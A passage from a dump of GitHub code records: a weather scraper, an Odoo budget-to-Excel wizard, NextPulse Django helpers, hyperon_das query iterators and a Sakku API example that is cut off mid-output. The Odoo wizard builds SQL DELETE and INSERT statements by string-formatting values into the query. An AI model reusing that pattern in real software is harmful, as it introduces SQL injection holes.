future_day_temperatures.append(soup.find_all('p','value')[0].contents[0][5:8])\n future_night_temperatures.append(soup.find_all('p','value')[1].contents[0][5:8])\n return future_dates,future_day_temperatures,future_night_temperatures\n\n\ndef get_past_data(past_dates,past_high_temperatures,past_low_temperatures):\n '''\n\n :param past_dates: empty list after initialization\n :param past_high_temperatures: empty list after initialization\n :param past_low_temperatures: empty list after initialization\n :return:\n '''\n for month in range(1,13):\n if month < 10:\n file_name = '2012-0' + str(month)\n else:\n file_name = '2012-' + str(month)\n with open(file_name +'.htm', 'r')as wb_data:\n soup_past = BeautifulSoup(wb_data, 'lxml')\n history = soup_past.find_all(id='history')[0]\n if month == 1 or month == 3 or month == 5 or month == 7 or month == 8 or month == 10 or month == 12:\n for i in range(0, 186, 6):\n past_dates.append(history.find_all('td')[i].contents[0])\n past_high_temperatures.append(history.find_all('td')[i + 1].contents[0] + '°')\n past_low_temperatures.append(history.find_all('td')[i + 2].contents[0] + '°')\n elif month == 4 or month == 6 or month == 9 or month == 11:\n for i in range(0, 180, 6):\n past_dates.append(history.find_all('td')[i].contents[0])\n past_high_temperatures.append(history.find_all('td')[i + 1].contents[0] + '°')\n past_low_temperatures.append(history.find_all('td')[i + 2].contents[0] + '°')\n else:\n for i in range(0, 168, 6):\n past_dates.append(history.find_all('td')[i].contents[0])\n past_high_temperatures.append(history.find_all('td')[i + 1].contents[0] + '°')\n past_low_temperatures.append(history.find_all('td')[i + 2].contents[0] + '°')\n\n return past_dates,past_high_temperatures,past_low_temperatures\n\n\n\n\ndef grab_data_from_downloaded_raw_files():\n # get data from the first url: future temperature\n future_dates = list()\n future_day_temperatures = list()\n future_night_temperatures = list()\n future_dates, future_day_temperatures, future_night_temperatures = get_data_of_future(future_dates, future_day_temperatures, future_night_temperatures)\n # store data as csv\n data = {'Day Temperature': future_day_temperatures, 'Night Temperature': future_night_temperatures}\n dataframe_future = pd.DataFrame(data, index=future_dates)\n dataframe_future.to_csv(\"future_temperature_from_url.csv\", index=True, sep=',')\n\n # get data from the first url: past temperature\n past_dates = list()\n past_high_temperatures = list()\n past_low_temperatures = list()\n past_dates, past_high_temperatures, past_low_temperatures = get_past_data(past_dates, past_high_temperatures,past_low_temperatures)\n # store data as csv\n months = {'jan': '01', 'feb': '02', 'mar': '03', 'apr': '04', 'may': '05', 'jun': '06', 'jul': '07', 'aug': '08',\n 'sep': '09', 'oct': '10', 'nov': '11', 'dec': '12'}\n past_dates_format = list()\n for i in range(0, 365):\n if 0 < int(past_dates[i].split()[0]) < 10:\n past_dates_format.append(\n past_dates[i].split()[2] + '-' + months[past_dates[i].split()[1]] + '-0' + past_dates[i].split()[0])\n else:\n past_dates_format.append(\n past_dates[i].split()[2] + '-' + months[past_dates[i].split()[1]] + '-' + past_dates[i].split()[0])\n past_data = {'Past High Temperature': past_high_temperatures, 'Past Low Temperature': past_low_temperatures}\n dataframe_past = pd.DataFrame(past_data, index=past_dates_format)\n dataframe_past.to_csv(\"past_temperature_from_url.csv\", index=True, sep=',')\n\n","repo_name":"qjasmine014/INF510","sub_path":":src/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73962724392","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom odoo import api, fields, models, _\r\nfrom odoo.tools import float_is_zero, float_compare\r\nfrom odoo.tools.misc import formatLang\r\n\r\nfrom odoo.exceptions import UserError, RedirectWarning, ValidationError\r\n\r\nimport odoo.addons.decimal_precision as dp\r\nimport json\r\nimport logging\r\nfrom openerp.http import request\r\nimport time\r\nimport base64\r\n\r\ntry:\r\n import xlsxwriter\r\nexcept ImportError:\r\n _logger.debug('Can not import xlsxwriter`.')\r\n\r\nimport logging\r\n\r\n_logger = logging.getLogger(__name__)\r\n\r\n\r\nclass presupuesto_ejecucion_gastos_contables(models.TransientModel):\r\n\t_name = \"presupuesto.ejecucion.gastos.contables\"\r\n\t_description = \"Ejecucion de Gastos Contables\"\r\n\r\n\tchart_rubros_id = fields.Many2one('presupuesto.rubros', 'Plan de Rubros', required=True, domain = [('parent_id','=', False)], default = lambda self: self._get_rubros(), ondelete = 'cascade')\r\n\tfiscalyear_id = fields.Many2one('account.fiscalyear', u'Año fiscal', select=True, required=True, default = lambda self: self._get_fiscalyear())\r\n\tcompany_id = fields.Many2one('res.company', 'Company', related = 'chart_rubros_id.company_id')\r\n\tperiod_from = fields.Many2one('account.period', 'Periodo inicial', required=True)\r\n\tperiod_to = fields.Many2one('account.period', 'Periodo final', required=True)\r\n\tperiod_ant = fields.Many2one('account.period', 'Periodo anterior')\r\n\r\n\tdata_ids = fields.One2many('presupuesto.ejecucion.gastos.contables.report', 'active_id', 'Records')\r\n\texcel_file_name = fields.Char('Nombre archivo excel')\r\n\texcel_file = fields.Binary('Archivo excel generado:', readonly='True')\r\n\r\n\t\r\n\tdef _get_rubros(self):\r\n\t\trubros = self.env['presupuesto.rubros'].search([('parent_id', '=', False), ('company_id', '=', self.env.user.company_id.id)], limit=1)\r\n\t\treturn rubros and rubros[0] or False\r\n\r\n\t\r\n\tdef _get_fiscalyear(self):\r\n\t\tcontext = self.env.context\r\n\r\n\t\tnow = time.strftime('%Y-%m-%d')\r\n\t\tcompany_id = False\r\n\t\tids = context.get('active_ids', [])\r\n\t\tif ids and context.get('active_model') == 'presupuesto.rubros':\r\n\r\n\t\t\tcompany_id = self.env['presupuesto.rubros'].browse(ids[0]).company_id.id\r\n\t\telse: # use current company id\r\n\t\t\tcompany_id = self.env.user.company_id.id\r\n\r\n\t\tdomain = [('company_id', '=', company_id), ('date_start', '<', now), ('date_stop', '>', now)]\r\n\t\tfiscalyears = self.env['account.fiscalyear'].search(domain)\r\n\t\treturn fiscalyears and fiscalyears[0] or False\r\n\r\n\t@api.onchange('period_to')\r\n\tdef onchange_period(self):\r\n\r\n\r\n\t\tif self.period_to:\r\n\r\n\t\t\tperiod = self.period_to\r\n\t\t\tyear = period.fiscalyear_id.id\r\n\t\t\tperiod_0 = period.id - 1\r\n\t\t\tperiod_0 = self.env['account.period'].browse(period_0)\r\n\t\t\tyear_0 = period_0.fiscalyear_id.id\r\n\t\t\tspecial_0 = period_0.special\r\n\t\t\tif year == year_0 and special_0 == False:\r\n\t\t\t\tperiod_0 = period_0.id\r\n\t\t\telse:\r\n\t\t\t\tperiod_0 = None\r\n\r\n\t\t\tself.period_ant = period_0\t\r\n\r\n\r\n\t@api.multi\r\n\tdef create_ejecucion_gastos_contables_excel(self):\r\n\r\n\t\tdatos = self.env['presupuesto.util'].sql({'rubro_tipo' : 'G'}, {\r\n\t\t\t'active_model' : 'presupuesto.ejecucion.gastos.contables',\r\n\t\t\t'active_id' : self.id\r\n\t\t})\r\n\t\tif datos:\r\n\t\t\tdatos = datos[ 0 ]\r\n\r\n\t\t\tself.env.cr.execute('delete from presupuesto_ejecucion_gastos_contables_report where active_id = %s' % ( self.id ))\r\n\r\n\t\t\tsql = 'insert into presupuesto_ejecucion_gastos_contables_report(active_id, rubro_codigo, rubro_nombre, rubro_nivel, rubro_codigo_cta_contable, rubro_nombre_cta_contable, obligacion_cta_mes_actual, obligacion_cta_acumulado, adiciones, reducciones, creditos, contracreditos, apropiacion_definitiva, ejecutado_anterior, ejecutado_mes, total_ejecutado, saldo_por_ejecutar, porcentaje, cdp_mes_anterior, cdp_mes_actual, cdp_acumulado, apropiacion_disponible, registro_mes_anterior, registro_mes_actual, registro_acumulado, comprometer, obligacion_mes_anterior, obligacion_mes_actual, obligacion_acumulado, por_obligar, pago_mes_anterior, pago_mes_actual, pago_acumulado, por_pagar) values'\r\n\t\t\tvalues = []\r\n\t\t\tfor dato in datos:\r\n\t\t\t\tdato.update({\r\n\t\t\t\t\t'active_id' : self.id\r\n\t\t\t\t})\r\n\t\t\t\tvalues.append(\"(%(active_id)s, '%(rubro_codigo)s', '%(rubro_nombre)s', '%(rubro_nivel)s', '%(rubro_codigo_cta_contable)s', '%(rubro_nombre_cta_contable)s', '%(obligacion_cta_mes_actual)s', '%(obligacion_cta_acumulado)s', '%(adiciones)s', '%(reducciones)s', '%(creditos)s', '%(contracreditos)s', '%(apropiacion_definitiva)s', '%(ejecutado_anterior)s', '%(ejecutado_mes)s', '%(total_ejecutado)s', '%(saldo_por_ejecutar)s', '%(porcentaje)s', '%(cdp_mes_anterior)s', '%(cdp_mes_actual)s', '%(cdp_acumulado)s', '%(apropiacion_disponible)s', '%(registro_mes_anterior)s', '%(registro_mes_actual)s', '%(registro_acumulado)s', '%(comprometer)s', '%(obligacion_mes_anterior)s', '%(obligacion_mes_actual)s', '%(obligacion_acumulado)s', '%(por_obligar)s', '%(pago_mes_anterior)s', '%(pago_mes_actual)s', '%(pago_acumulado)s', '%(por_pagar)s')\" % dato )\r\n\r\n\t\t\tsql = sql + ','.join( values )\t\r\n\r\n\t\t\t_logger.info( sql )\r\n\r\n\t\t\tself.env.cr.execute( sql )\r\n\r\n\t\tworkbook = xlsxwriter.Workbook('/tmp/presupuesto_ejecucion_gastos_contables.xlsx')\r\n\t\tworksheet = workbook.add_worksheet()\r\n\t\tformat_company = workbook.add_format({'bold': True, 'font_size': 14, 'align': 'left', })\r\n\t\tformat_titulo = workbook.add_format({'bold': True, 'font_size': 14, 'align': 'center'})\r\n\t\tformat_cabecera = workbook.add_format({'bold': True, 'font_size': 12, 'border': True, 'align': 'center', 'valign': 'vcenter', 'bg_color': 'gray'})\r\n\t\tformat_celda_str = workbook.add_format({'font_size': 12, 'border': True})\r\n\t\tformat_celda_num = workbook.add_format({'font_size': 12, 'border': True, 'num_format': '#,##0.00'})\r\n\t\tworksheet.set_row(3,35)\r\n\t\tworksheet.set_column('A:A',10)\r\n\t\tworksheet.set_column('B:B',30)\r\n\t\tworksheet.set_column('C:C',4)\r\n\t\tworksheet.set_column('D:D',10)\r\n\t\tworksheet.set_column('E:E',30)\r\n\t\tworksheet.set_column('F:T',20)\r\n\t\tcompany = self.env.user.partner_id.company_id.name\r\n\t\trec_gastos = self.sudo().env['presupuesto.ejecucion.gastos.contables.report'].search([('active_id', '=', self.id)])\r\n\t\tworksheet.merge_range('A1:D1', company, format_company)\r\n\t\tworksheet.merge_range('A3:M3', u'Ejecución de Gastos Contables', format_titulo)\r\n\t\tworksheet.merge_range('A4:A5', 'Rubro', format_cabecera)\r\n\t\tworksheet.merge_range('B4:B5', 'Nombre', format_cabecera)\r\n\t\tworksheet.merge_range('C4:C5', 'N', format_cabecera)\r\n\t\tworksheet.merge_range('D4:D5', 'Cuenta\\ncontable', format_cabecera)\r\n\t\tworksheet.merge_range('E4:E5', 'Nombre', format_cabecera)\r\n\t\tworksheet.merge_range('F4:G4', u'Obligación Rubro', format_cabecera)\r\n\t\tworksheet.merge_range('H4:I4', u'Obligación cuenta contable', format_cabecera)\r\n\t\tworksheet.merge_range('J4:K4', 'Pago', format_cabecera)\r\n\t\tworksheet.merge_range('L4:M4', 'Cta. x pagar', format_cabecera)\r\n\t\trow = 4\r\n\t\tworksheet.write(row, 5, 'MES', format_cabecera)\r\n\t\tworksheet.write(row, 6, 'ACUM', format_cabecera)\r\n\t\tworksheet.write(row, 7, 'MES', format_cabecera)\r\n\t\tworksheet.write(row, 8, 'ACUM', format_cabecera)\r\n\t\tworksheet.write(row, 9, 'MES', format_cabecera)\r\n\t\tworksheet.write(row, 10, 'ACUM', format_cabecera)\r\n\t\tworksheet.write(row, 11, 'MES', format_cabecera)\r\n\t\tworksheet.write(row, 12, 'ACUM', format_cabecera)\r\n\t\trow = 5\r\n\t\tfor gasto in rec_gastos:\r\n\t\t\tworksheet.write(row, 0, gasto.rubro_codigo, format_celda_str)\r\n\t\t\tworksheet.write(row, 1, gasto.rubro_nombre, format_celda_str)\r\n\t\t\tworksheet.write(row, 2, gasto.rubro_nivel, format_celda_str)\r\n\t\t\tworksheet.write(row, 3, gasto.rubro_codigo_cta_contable, format_celda_str)\r\n\t\t\tworksheet.write(row, 4, gasto.rubro_nombre_cta_contable, format_celda_str)\r\n\t\t\tworksheet.write(row, 5, gasto.obligacion_mes_actual, format_celda_num)\r\n\t\t\tworksheet.write(row, 6, gasto.obligacion_acumulado, format_celda_num)\r\n\t\t\tworksheet.write(row, 7, gasto.obligacion_cta_mes_actual, format_celda_num)\r\n\t\t\tworksheet.write(row, 8, gasto.obligacion_cta_acumulado, format_celda_num)\r\n\t\t\tworksheet.write(row, 9, gasto.pago_mes_actual, format_celda_num)\r\n\t\t\tworksheet.write(row, 10, gasto.pago_acumulado, format_celda_num)\r\n\t\t\tworksheet.write(row, 11, gasto.obligacion_mes_actual - gasto.pago_mes_actual, format_celda_num)\r\n\t\t\tworksheet.write(row, 12, gasto.obligacion_acumulado - gasto.pago_acumulado, format_celda_num)\r\n\t\t\trow += 1\r\n\t\t\tcol = 0\r\n\t\tworkbook.close()\r\n\t\tarchivo_excel = open('/tmp/presupuesto_ejecucion_gastos_contables.xlsx','rb')\r\n\t\tsalida = archivo_excel.read()\r\n\t\tarchivo_excel.close()\r\n\r\n\t\tself.excel_file_name = 'presupuesto_ejecucion_gastos_contables.xlsx'\r\n\t\tself.excel_file = base64.b64encode(salida)\r\n\r\n\t\treturn {'type' : 'ir.actions.act_window', 'res_model' : self._name, 'res_id' : self.id, 'view_type' : 'form', 'view_mode' : 'form', 'target' : 'new'} \r\n\r\npresupuesto_ejecucion_gastos_contables()\r\n ","repo_name":"hivam/l10n_co_budget","sub_path":"wizard/presupuesto_ejecucion_gastos_contables_wz.py","file_name":"presupuesto_ejecucion_gastos_contables_wz.py","file_ext":"py","file_size_in_byte":8742,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74079755432","text":"\nimport datetime\nimport datetime as dt\nimport calendar\nfrom api.models import *\nfrom api.basics import *\nfrom collections import OrderedDict\nLOCAL_ZONE = \"Asia/Kolkata\"\nfrom common.utils import getHttpResponse as json_HttpResponse\n\ndef data_dict(variable):\n \"\"\"It generates common code required for all the widgets\"\"\"\n \n main_data_dict = {}\n from_date = datetime.datetime.strptime(variable['from'],'%Y-%m-%d').date()\n to_date = datetime.datetime.strptime(variable['to'],'%Y-%m-%d').date()\n project_name = variable.get('project','')\n if project_name:\n project_name = project_name.split(' -')[0]\n center_name = variable.get('center','')\n if center_name:\n center_name = center_name.split(' -')[0]\n pro_cen_mapping = []\n pro_cen_mapping.append(Project.objects.filter(name=project_name).values_list('id', 'name')[0])\n pro_cen_mapping.append(Center.objects.filter(name=center_name).values_list('id', 'name')[0])\n main_data_dict['pro_cen_mapping'] = pro_cen_mapping\n main_data_dict['work_packet'] = variable.get('work_packet',[])\n main_data_dict['sub_project'] = variable.get('sub_project','')\n main_data_dict['sub_packet'] = variable.get('sub_packet','')\n dwm_dict= {}\n date_list=num_of_days(to_date,from_date)\n type = variable.get('type','')\n if type == '':\n type = 'day'\n is_clicked = variable.get('is_clicked','NA')\n if type == 'day':\n if 'yes' not in is_clicked:\n date_count = len(date_list)\n if date_count > 15:\n type = 'week'\n if date_count > 60:\n type = 'month'\n if date_count == 1:\n type = 'hour'\n dwm_dict['day']= date_list\n main_data_dict['dwm_dict'] = dwm_dict\n \n if type == 'hour':\n hours_data = []\n data = [(i, dt.time(i).strftime('%I %p')) for i in range(24)]\n for i in data:\n hours_data.append(i[0])\n dwm_dict['hour'] = hours_data\n main_data_dict['dates'] = date_list\n main_data_dict['dwm_dict'] = dwm_dict\n\n if type == 'week':\n months_dict = {}\n weeks_data = [] \n days = (to_date - from_date).days\n days = days+1\n for i in xrange(days):\n date = from_date + datetime.timedelta(i)\n weeks_data.append(str(date))\n weeks = [] \n weekdays = [] \n fro_mon = datetime.datetime.strptime(weeks_data[0],'%Y-%m-%d').date()\n to_mon = datetime.datetime.strptime(weeks_data[-1],'%Y-%m-%d').date()\n no_of_days = to_mon - fro_mon\n num_days = int(re.findall('\\d+', str(no_of_days))[0]) + 1\n week_list=[]\n start = 1\n end = 7 - fro_mon.weekday()\n while start <= num_days:\n weeks.append({'start': start, 'end': end})\n sdate = fro_mon + datetime.timedelta(start - 1)\n edate = fro_mon + datetime.timedelta(end - 1)\n weekdays.append({'start': sdate, 'end': edate})\n start = end + 1\n end = end + 7\n if end > num_days:\n end = num_days\n if weekdays[-1]['end'] > to_mon :\n weekdays[-1]['end'] = to_mon\n for w_days in weekdays:\n date_list = num_of_days(w_days['end'],w_days['start'])\n week_list.append(date_list)\n\n if type == 'week':\n employe_dates = {}\n dwm_dict['week'] = week_list\n for week in week_list:\n if week and employe_dates.has_key('days'):\n employe_dates['days'] = employe_dates['days']+week\n\n else:\n employe_dates['days'] = week\n \n main_data_dict['dwm_dict'] = dwm_dict\n\n if type == 'month':\n months_dict = {}\n month_list = [[]]\n month_names_list = []\n month_count = 0\n days = (to_date - from_date).days\n days = days+1\n\n for i in xrange(0, days):\n date = from_date + datetime.timedelta(i)\n month = date.strftime(\"%B\")\n month = month+'_'+str(date).split('-')[0]\n if month not in month_names_list:\n month_names_list.append(month)\n if month in months_dict:\n months_dict[month].append(str(date))\n month_list[month_count].append(str(date))\n else:\n months_dict[month] = [str(date)]\n month_count = month_count + 1\n month_list.append([str(date)])\n if month_list[0] == []:\n del month_list[0]\n \n if type == 'month':\n dwm_dict['month'] = {'month_names':month_names_list, 'month_dates':month_list}\n main_data_dict['dwm_dict'] = dwm_dict\n main_data_dict['type'] = type\n return main_data_dict \n\n\ndef get_packet_details(request):\n \"\"\"It will generate all the list of packets, projects and sub packets for the project\"\"\"\n\n main_data_dict = data_dict(request.GET)\n if main_data_dict['type'] == 'hour':\n dates = main_data_dict['dwm_dict']['day']\n else:\n dates = [main_data_dict['dwm_dict']['day'][:-1][0], main_data_dict['dwm_dict']['day'][-1:][0]]\n final_dict = {}\n if main_data_dict['type'] == 'hour':\n raw_master_set = RawTable.objects.filter(\\\n project=main_data_dict['pro_cen_mapping'][0][0], center=main_data_dict['pro_cen_mapping'][1][0], date=dates[0])\n else:\n raw_master_set = RawTable.objects.filter(\\\n project=main_data_dict['pro_cen_mapping'][0][0], center=main_data_dict['pro_cen_mapping'][1][0], \\\n date__range=dates)\n \n sub_pro_level = filter(None, raw_master_set.values_list('sub_project',flat=True).distinct())\n sub_project_level = [i for i in sub_pro_level]\n if sub_project_level:\n sub_project_level.append('all')\n else:\n sub_project_level = ''\n work_pac_level = filter(None, raw_master_set.values_list('work_packet',flat=True).distinct())\n work_packet_level = [j for j in work_pac_level]\n if work_packet_level:\n work_packet_level.append('all')\n else:\n work_packet_level = ''\n sub_pac_level = filter(None, raw_master_set.values_list('sub_packet',flat=True).distinct())\n sub_packet_level = [k for k in sub_pac_level]\n if sub_packet_level:\n sub_packet_level.append('all')\n else:\n sub_packet_level = ''\n prj_type = request.GET.get('voice_project_type', '')\n if main_data_dict['type'] == 'hour':\n inbound_hourly_master_set = InboundDaily.objects.filter(\\\n project=main_data_dict['pro_cen_mapping'][0][0], center=main_data_dict['pro_cen_mapping'][1][0],\\\n date = dates[0])\n outbound_hourly_master_set = OutboundDaily.objects.filter(\\\n project=main_data_dict['pro_cen_mapping'][0][0], center=main_data_dict['pro_cen_mapping'][1][0],\\\n date = dates[0])\n else:\n inbound_hourly_master_set = InboundDaily.objects.filter(\\\n project=main_data_dict['pro_cen_mapping'][0][0], center=main_data_dict['pro_cen_mapping'][1][0],\\\n date__range = dates)\n outbound_hourly_master_set = OutboundDaily.objects.filter(\\\n project=main_data_dict['pro_cen_mapping'][0][0], center=main_data_dict['pro_cen_mapping'][1][0],\\\n date__range = dates)\n if prj_type == 'inbound' or prj_type == '':\n location_names = filter(None, inbound_hourly_master_set.values_list('location',flat=True).distinct())\n elif prj_type == 'outbound':\n location_names = ''\n else:\n location_names = ''\n location_list, skill_list, dispo_list = [], [], []\n for location in location_names:\n location_list.append(location)\n if prj_type == 'inbound' or prj_type == '':\n skill_names = filter(None, inbound_hourly_master_set.values_list('skill',flat=True).distinct())\n elif prj_type == 'outbound':\n skill_names = ''\n else:\n skill_names = ''\n for skill in skill_names:\n skill_list.append(skill)\n if prj_type == 'inbound' or prj_type == '':\n disposition_names = filter(None, inbound_hourly_master_set.values_list('disposition',flat=True).distinct())\n elif prj_type == 'outbound':\n disposition_names = filter(None, outbound_hourly_master_set.values_list('disposition',flat=True).distinct())\n else:\n disposition_names = ''\n is_voice = Project.objects.filter(\\\n id=main_data_dict['pro_cen_mapping'][0][0], center=main_data_dict['pro_cen_mapping'][1][0])\\\n .values_list('is_voice', flat=True).distinct()\n if is_voice:\n is_voice = is_voice[0]\n else:\n is_voice = ''\n for dispo in disposition_names:\n dispo_list.append(dispo)\n if location_list:\n location_list.append('All')\n location_list.sort()\n else:\n location_list = ''\n if skill_list:\n skill_list.append('All')\n skill_list.sort()\n else:\n skill_list = ''\n if dispo_list:\n dispo_list.append('All')\n dispo_list.sort()\n else:\n dispo_list = ''\n final_details = {}\n final_details['sub_project'] = 0\n final_details['work_packet'] = 0\n final_details['sub_packet'] = 0\n if sub_pro_level:\n final_details['sub_project'] = 1\n if work_pac_level:\n final_details['work_packet'] = 1\n if sub_pac_level:\n final_details['sub_packet'] = 1\n prj_id = main_data_dict['pro_cen_mapping'][0][0]\n center = main_data_dict['pro_cen_mapping'][1][0]\n final_dict['sub_project_level'] = sub_project_level\n final_dict['work_packet_level'] = work_packet_level\n final_dict['sub_packet_level'] = sub_packet_level\n final_dict['location'] = location_list\n final_dict['skill'] = skill_list\n final_dict['disposition'] = dispo_list\n final_dict['is_voice'] = is_voice\n final_dict['type'] = main_data_dict['type']\n big_dict = {}\n if final_details['sub_project']:\n if final_details['work_packet']:\n first = raw_master_set.values_list('sub_project').distinct()\n big_dict = {}\n total = {}\n for i in first:\n list_val = RawTable.objects.filter(project=prj_id, sub_project=i[0], date__range=dates)\\\n .values_list('work_packet').distinct()\n for j in list_val:\n if j[0] != \"\":\n total[j[0]] = []\n sub_pac_data = RawTable.objects.filter(project=prj_id, sub_project=i[0], work_packet=j[0], date__range=dates)\\\n .values_list('sub_packet').distinct()\n for l in sub_pac_data:\n if l[0] != \"\":\n total[j[0]].append(l[0])\n big_dict[i[0]] = total\n total = {}\n elif final_details['work_packet']:\n if final_details['sub_packet']:\n first = raw_master_set.values_list('work_packet').distinct()\n big_dict = {}\n total = {}\n for i in first:\n list_val = RawTable.objects.filter(project=prj_id, work_packet=i[0], date__range=dates).\\\n values_list('sub_packet').distinct()\n for j in list_val:\n total[j[0]] = []\n big_dict[i[0]] = total\n total = {}\n else:\n big_dict = {}\n work_pac_level = raw_master_set.values_list('work_packet').distinct()\n for i in work_pac_level:\n big_dict[i[0]] = {}\n final_dict['level'] = [1, 2]\n final_dict['fin'] = final_details\n final_dict['drop_value'] = big_dict\n return json_HttpResponse(final_dict)\n\n\ndef utc_to_local(utc_dt):\n \"\"\"convert utc time to local time \"\"\"\n localtime = utc_dt + datetime.timedelta(hours = 5, minutes = 30)\n return localtime\n\n","repo_name":"headrun/NextPulse","sub_path":"backend/api/commons.py","file_name":"commons.py","file_ext":"py","file_size_in_byte":12168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33623527784","text":"from abc import ABC, abstractmethod\nfrom itertools import product\nfrom typing import Any, Dict, List, Optional\n\nfrom hyperon_das_atomdb import WILDCARD\n\nfrom hyperon_das.utils import Assignment, QueryAnswer, QueryOutputFormat\n\n\nclass QueryAnswerIterator(ABC):\n def __init__(self, source: Any):\n self.source = source\n self.current_value = None\n self.iterator = None\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if not self.source or self.iterator is None:\n raise StopIteration\n try:\n self.current_value = next(self.iterator)\n except StopIteration as exception:\n self.current_value = None\n raise exception\n return self.current_value\n\n def get(self) -> Any:\n if not self.source or self.current_value is None:\n raise StopIteration\n return self.current_value\n\n def __str__(self):\n return str(self.source)\n\n @abstractmethod\n def is_empty(self) -> bool:\n pass\n\n\nclass ListIterator(QueryAnswerIterator):\n def __init__(self, source: List[Any]):\n super().__init__(source)\n if source:\n self.iterator = iter(self.source)\n self.current_value = source[0]\n\n def is_empty(self) -> bool:\n return not self.source\n\n\nclass ProductIterator(QueryAnswerIterator):\n def __init__(self, source: List[QueryAnswerIterator]):\n super().__init__(source)\n if not self.is_empty():\n self.current_value = tuple([iterator.get() for iterator in source])\n self.iterator = product(*self.source)\n\n def is_empty(self) -> bool:\n return any(iterator.is_empty() for iterator in self.source)\n\n\nclass AndEvaluator(ProductIterator):\n def __init__(self, source: List[QueryAnswerIterator]):\n super().__init__(source)\n\n def __next__(self):\n while True:\n candidate = super().__next__()\n assignments = [query_answer.assignment for query_answer in candidate]\n composite_assignment = Assignment.compose(assignments)\n if composite_assignment:\n composite_subgraph = [query_answer.subgraph for query_answer in candidate]\n return QueryAnswer(composite_subgraph, composite_assignment)\n\n\nclass LazyQueryEvaluator(ProductIterator):\n def __init__(\n self,\n link_type: str,\n source: List[QueryAnswerIterator],\n das: \"DistributedAtomSpace\",\n query_parameters: Optional[Dict[str, Any]],\n ):\n super().__init__(source)\n self.link_type = link_type\n self.query_parameters = query_parameters\n self.das = das\n self.buffered_answer = None\n\n def _replace_target_handles(self, link: Dict[str, Any]) -> Dict[str, Any]:\n targets = []\n for target_handle in link[\"targets\"]:\n atom = self.das.local_backend.get_atom_as_dict(target_handle)\n if atom.get(\"targets\", None) is not None:\n atom = self._replace_target_handles(atom)\n targets.append(atom)\n link[\"targets\"] = targets\n return link\n\n def __next__(self):\n if self.buffered_answer:\n try:\n return self.buffered_answer.__next__()\n except StopIteration as exception:\n self.buffered_answer = None\n target_info = super().__next__()\n target_handle = []\n wildcard_flag = False\n for query_answer_target in target_info:\n target = query_answer_target.subgraph\n if target.get(\"atom_type\", None) == \"variable\":\n target_handle.append(WILDCARD)\n wildcard_flag = True\n else:\n target_handle.append(target[\"handle\"])\n das_query_answer = self.das.get_links(self.link_type, None, target_handle)\n lazy_query_answer = []\n for answer in das_query_answer:\n assignment = None\n if wildcard_flag:\n assignment = Assignment()\n assignment_failed = False\n for query_answer_target, handle in zip(target_info, answer[\"targets\"]):\n target = query_answer_target.subgraph\n if target.get(\"atom_type\", None) == \"variable\":\n if not assignment.assign(target[\"name\"], handle):\n assignment_failed = True\n else:\n if not assignment.merge(query_answer_target.assignment):\n assignment_failed = True\n if assignment_failed:\n break\n if assignment_failed:\n continue\n assignment.freeze()\n\n lazy_query_answer.append(QueryAnswer(self._replace_target_handles(answer), assignment))\n self.buffered_answer = ListIterator(lazy_query_answer)\n return self.buffered_answer.__next__()\n","repo_name":"singnet/das-query-engine","sub_path":"hyperon_das/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":4946,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32592867736","text":"# coding=utf-8\nfrom __future__ import unicode_literals\nfrom sakku import Application, SakkuException, HttpException\nfrom examples.config import *\n\ntry:\n app = Application(api_key=API_KEY)\n\n response = app.get_app_setting(app_id=APP_ID)\n print(response)\n # OUTPUT\n # {\n # \"id\": 2688,\n # \"name\": \"pythontest\",\n # \"cpu\": 0.2,\n # \"mem\": 0.2,\n # \"disk\": 0.1,\n # \"image\": {\n # \"name\": \"nginx\",\n # \"registry\": \"dockerhub\",\n # \"username\": None,\n # \"tag\": \"latest\",\n # \"createDate\": 1584279280182,\n # \"buildSuccessfully\": True,\n # \"autoBuildUUID\": None\n # },\n # \"git\": None,\n # \"minInstance\": 1,\n # \"maxInstance\": 1,\n # \"cmd\": None,\n # \"entrypoint\": None,\n # \"scalingMode\": \"OFF\",\n # \"args\": [],\n # \"modules\": [\n # {\n # \"code\": 50,\n # \"appId\": 0,\n # \"metadata\": {\n # \"ftp\": \"false\",\n # \"appPath\": \"/usr/share/nginx/html\"\n # }\n # }\n # ],\n # \"environments\": {},\n # \"deployType\": \"DOCKER_IMAGE\",\n # \"lastRestartReason\": None,\n # \"lastTaskFailure\": None,\n # \"currentInstances\": 1,\n # \"lastScalingAt\": 1584281585443,\n # \"instances\": [\n # {\n # \"containerId\": \"1b9**********************************************************9ec\",\n # \"workerHost\": \"worker2.sakku.cloud\",\n # \"internalIP\": \"10.0.63.28\",\n # \"metadata\": \"\",\n # \"uptimeSeconds\": 147480,\n # \"stagedAt\": 1584281591200,\n # \"startedAt\": 1584281593600\n # }\n # ],\n # \"deploymentIds\": [],\n # \"network\": \"default_user_network_197\",\n # \"jsonConfig\": {\n # \"name\": \"PythonTest\",\n # \"cpu\": 0.2,\n # \"mem\": 0.2,\n # \"disk\": 0.1,\n # \"ports\": [\n # {\n # \"host\": 0,\n # \"port\": 80,\n # \"protocol\": \"http\",\n # \"ssl\": False,\n # \"onlyInternal\": False,\n # \"basicAuthentication\": False,\n # \"forceRedirectHttps\": False\n # }\n # ],\n # \"minInstance\": 1,\n # \"maxInstance\": 1,\n # \"cmd\": \"\",\n # \"entrypoint\": None,\n # \"scalingMode\": \"OFF\",\n # \"args\": [],\n # \"modules\": [\n # {\n # \"code\": 50,\n # \"appId\": 0,\n # \"metadata\": {\n # \"ftp\": \"false\",\n # \"appPath\": \"/usr/share/nginx/html\"\n # }\n # }\n # ],\n # \"environments\": {},\n # \"labels\": {},\n # \"links\": [],\n # \"netAlias\": None,\n # \"healthChecks\": [],\n # \"basicAuthentications\": [],\n # \"portOptions\": [],\n # \"image\": {\n # \"name\": \"nginx:latest\",\n # \"registry\": \"dockerhub\",\n # \"accessToken\": \"\",\n # \"username\": \"\"\n # },\n # \"git\": None,\n # \"app\": None,\n # \"deployType\": \"DOCKER_IMAGE\",\n # \"worker\": None,\n # \"network\": None,\n # 